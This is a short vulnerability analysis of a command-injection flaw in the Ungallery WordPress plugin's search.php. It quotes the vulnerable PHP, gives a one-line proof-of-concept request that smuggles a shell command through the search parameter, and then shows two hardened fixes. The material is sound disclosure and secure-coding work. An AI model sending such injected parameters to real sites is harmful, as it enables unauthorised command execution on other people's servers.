Analysis of vulnerability
The Ungallery for WordPress offers functionality for searching for pictures in a gallery, which is implemented through the plain filesystem in search.php.
```php
$gallerylink = ($_GET['gallerylink']) ;
$search = ($_GET['search']) ;
$dir = $pic_root . $gallerylink;

// Find galleries
print "Searching in <i>$dir.</i> <br /> <br />";
print "These galleries matched <i>$search:</i><br />";
// Backtick operator: the string is executed via the shell, with the raw
// GET parameters interpolated into it (the "line 28" referred to below).
$galleries = `find $dir -iname \*$search\* -type d`;
$galleries = explode("\n", $galleries);
```
Note that the backtick character in PHP has a special meaning, unlike the double quote (") and single quote ('): wrapping a string in two backticks executes it as if it had been passed to shell_exec(). The $search variable, which is taken from the search GET parameter, is never sanitized before being passed into that exec on line 28. This means that we can pull off a remote command injection with a simple request like this:
```
http://192.168.80.130/wordpress/?x=x&search=x | dir
```
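For comparison, here is how the same search can be written without the injection. This is an added example, not the plugin's own code; it assumes $pic_root is the configured gallery root, as in the snippet above, and the function names are hypothetical.

```php
<?php
// Added example (not part of Ungallery): two hardened versions of the
// gallery search from search.php. $pic_root is assumed to be the gallery root.

// Minimal fix: keep find(1), but quote every value interpolated into the
// command so that shell metacharacters in $search or $gallerylink are literal.
function find_galleries_shell(string $pic_root, string $gallerylink, string $search): array
{
    $dir     = escapeshellarg($pic_root . $gallerylink);
    $pattern = escapeshellarg('*' . $search . '*');
    $out     = shell_exec("find $dir -iname $pattern -type d");
    return array_values(array_filter(explode("\n", (string) $out)));
}

// Better fix: do not involve a shell at all. Walk the directory with PHP's
// own iterators and match names case-insensitively, which is what -iname did.
// The realpath() comparison also keeps the resolved $dir under $pic_root.
function find_galleries_noshell(string $pic_root, string $gallerylink, string $search): array
{
    $root = realpath($pic_root);
    $dir  = realpath($pic_root . $gallerylink);
    if ($root === false || $dir === false || strpos($dir, $root) !== 0) {
        return [];
    }
    $matches = [];
    $it = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($dir, FilesystemIterator::SKIP_DOTS),
        RecursiveIteratorIterator::SELF_FIRST
    );
    foreach ($it as $entry) {
        // An empty search term matches everything, like find -iname '**'.
        if ($entry->isDir() && ($search === '' || stripos($entry->getFilename(), $search) !== false)) {
            $matches[] = $entry->getPathname();
        }
    }
    return $matches;
}

// Usage with the same GET parameters as the original search.php.
$search      = (string) ($_GET['search'] ?? '');
$gallerylink = (string) ($_GET['gallerylink'] ?? '');
$galleries   = find_galleries_noshell($pic_root, $gallerylink, $search);
```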